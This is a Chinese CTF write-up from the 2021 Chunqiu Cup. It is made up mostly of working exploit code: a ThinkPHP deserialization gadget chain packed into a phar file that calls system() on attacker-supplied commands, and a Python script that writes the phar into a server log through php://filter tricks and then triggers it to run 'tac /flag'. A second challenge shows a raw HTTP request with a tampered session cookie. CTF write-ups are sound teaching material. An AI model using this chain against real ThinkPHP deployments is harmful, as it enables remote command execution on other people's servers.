namespace think{abstract class Model{protected $append = [];private $data = [];function __construct(){$this->append = ["ethan"=>["dir","calc"]];$this->data = ["ethan"=>new Request()];}}class Request{protected $hook = [];protected $filter = "system";protected $config = [// 表单请求类型伪装变量'var_method' => '_method',// 表单ajax伪装变量'var_ajax' => '_ajax',// 表单pjax伪装变量'var_pjax' => '_pjax',// PATHINFO变量名 用于兼容模式'var_pathinfo' => 's',// 兼容PATH_INFO获取'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],// 默认全局过滤方法 用逗号分隔多个'default_filter' => '',// 域名根,如thinkphp.cn'url_domain_root' => '',// HTTPS代理标识'https_agent_name' => '',// IP代理获取标识'http_agent_ip' => 'HTTP_X_REAL_IP',// URL伪静态后缀'url_html_suffix' => 'html',];function __construct(){$this->filter = "system";$this->config = ["var_ajax"=>''];$this->hook = ["visible"=>[$this,"isAjax"]];}}}namespace thinkprocesspipes{use thinkmodelconcernConversion;use thinkmodelPivot;class Windows{private $files = [];public function __construct(){$this->files=[new Pivot()];}}}namespace thinkmodel{use thinkModel;class Pivot extends Model{}}namespace {use thinkprocesspipesWindows;// echo base64_encode(serialize(new Windows()));@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$o = new Windows();$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();}/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/
cat phar.phar | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
import requests# host = "http://127.0.0.1:80/public"host ='http://eci-2ze5b7k5rcrtgb6lqz3z.cloudeci1.ichunqiu.com/index.php'burp0_url = host + "/index/index/hello?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp0_url)burp00_url = host + "/index/index/hello?file=AA"requests.get(burp00_url)burp01_url = host + "/index/index/hello?file=AA=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=42=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=4C=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4E=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=4D=00=30=00=4F=00=69=00=49=00=41=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=41=00=47=00=5A=00=70=00=62=00=47=00=56=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=50=00=4F=00=6A=00=45=00=33=00=4F=00=69=00=4A=00=30=00=61=00=47=00=6C=00=75=00=61=00=31=00=78=00=74=00=62=00=32=00=52=00=6C=00=62=00=46=00=78=00=51=00=61=00=58=00=5A=00=76=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=68=00=63=00=48=00=42=00=6C=00=62=00=6D=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=61=00=58=00=49=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=4D=00=69=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=41=00=48=00=52=00=6F=00=61=00=57=00=35=00=72=00=58=00=45=00=31=00=76=00=5A=00=47=00=56=00=73=00=41=00=47=00=52=00=68=00=64=00=47=00=45=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=55=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=36=00=4D=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6F=00=62=00=32=00=39=00=72=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=64=00=6D=00=6C=00=7A=00=61=00=57=00=4A=00=73=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=6A=00=6F=00=35=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6D=00=6C=00=7A=00=51=00=57=00=70=00=68=00=65=00=43=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=5A=00=70=00=62=00=48=00=52=00=6C=00=63=00=69=00=49=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=64=00=6D=00=46=00=79=00=58=00=32=00=46=00=71=00=59=00=58=00=67=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=44=00=6F=00=69=00=49=00=6A=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=2F=00=4D=00=65=00=78=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=61=00=47=00=63=00=79=00=42=00=72=00=68=00=73=00=64=00=4D=00=44=00=44=00=74=00=71=00=69=00=66=00=74=00=4A=00=7A=00=4D=00=71=00=41=00=6B=00=4B=00=46=00=49=00=49=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00"requests.get(burp01_url)burp02_url = host + "/index/index/hello?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp02_url)burp03_url = host + "/index/index/hello?file=phar:///var/www/html/runtime/log/202105/29.log&id=tac /flag"res = requests.get(burp03_url)print(res.text)
flag{d94da2d7-574e-46b6-87a3-33c90fe3767a}
源码
POST /levelup HTTP/1.1Host: eci-2zebjnza8y58psty4hey.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1620482691; UM_distinctid=1794c4ba07562-01cbdedfb764ce8-c791039-1aeaa0-1794c4ba0769b9; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; __jsluid_h=954b9eeb8fc650893eb6696dbe7afbe5; session=eyJoaXN0b3J5IjpbIuS9oOaYr+S4gOS9jeWLh+aVoueahGN0ZmVyIiwi5ZCs6K+05Zyo6YGl6L+c55qE5b285bK4Iiwi5a2Y5Zyo552A5LiA5Liq56We56eY5bel5YW3Iiwi5Lyg6K+05Y+q6KaB6I635b6X5LqG6L+Z5Liq5bel5YW3Iiwi5bCx5Y+v5Lul5LiA6ZSuIHB5dGhvbjMgLi9leHAucHkgaXAgcG9ydCDmi79zaGVsbCIsIuS4uuS6hui1ouW+l+avlOi1m++8jOi1sOS4iuS6uueUn+W3heWzsO+8jOS9oOS4jemhvuaXgeS6uueahOmEmeinhuS4juWKnemYu++8jOavheeEtuWGs+eEtueahOi1sOS4iuS6hui/meadoei3r+OAgiIsIuato+WcqOeUn+aIkOaAqueJqVtkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS5bZGVsYXkoMTAwMCldLltkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS4iXSwicGxheWVyIjp7Im5hbWUiOiJQbGF5ZXIiLCJmYWN0b3IiOjk5OTk5OTk5OSwiQVRLIjo5OTk5OTksIkRFRiI6OTk5OTk5OTksIkhQIjo5OTk5OTk5OTl9LCJjb2luIjoxLCJpbml0Ijp0cnVlLCJtb25zdGVyIjpbXX0=; session.sig=pvQuGF6QvbkG8T1pL9isXJmifzUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/jsonContent-Length: 18{"f":"12222+2222"}
获取大量攻击力等等
带着cookie 多次请求
得到flag
把[delay(1000*10)]替换成空
flag{fc2b633a-5f4a-4d26-94bf-3f152d4872b0}
EDI安全
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(bgbing安全):【wp】ctf-2021春秋杯
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论